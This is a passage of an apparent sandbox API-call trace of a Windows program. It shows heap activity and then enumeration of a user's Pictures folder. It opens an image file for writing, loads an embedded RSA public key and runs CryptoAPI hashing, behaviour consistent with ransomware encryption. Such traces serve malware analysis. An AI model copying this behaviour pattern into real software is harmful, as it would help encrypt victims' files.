1 [0199.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.721] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\") returned="kyMAgs7f-4q1mza r\\" [0199.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f5d0 [0199.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.721] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0199.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f5d0 | out: hHeap=0x620000) returned 1 [0199.722] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.722] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.722] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.722] PathFindFileNameW (pszPath="") returned="" [0199.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.722] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0199.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.725] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.725] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc59090, ftCreationTime.dwHighDateTime=0x1d89b4d, ftLastAccessTime.dwLowDateTime=0x9d4afd50, ftLastAccessTime.dwHighDateTime=0x1d8a2d9, ftLastWriteTime.dwLowDateTime=0x9d4afd50, ftLastWriteTime.dwHighDateTime=0x1d8a2d9, nFileSizeHigh=0x0, nFileSizeLow=0x7b2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2j2l02AsmvpG-FW9.gif", cAlternateFileName="2J2L02~1.GIF")) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.725] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\2j2l02AsmvpG-FW9.gif") returned=".gif" [0199.725] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\2j2l02AsmvpG-FW9.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\2j2l02asmvpg-fw9.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.726] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=31535) returned 1 [0199.726] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.729] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x7b09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.729] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.734] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.734] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x7b2f, lpOverlapped=0x0) returned 1 [0199.735] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.736] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.737] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.737] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.737] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.737] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.737] GetLastError () returned 0x0 [0199.737] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.737] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.738] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.738] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.738] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7b30) returned 0x2ea79b0 [0199.738] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f5d0 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f618 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.739] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea31e8 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0199.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.742] GetCurrentThreadId () returned 0x66c [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea68e0 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.743] GetCurrentThreadId () returned 0x66c [0199.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.744] HeapFree 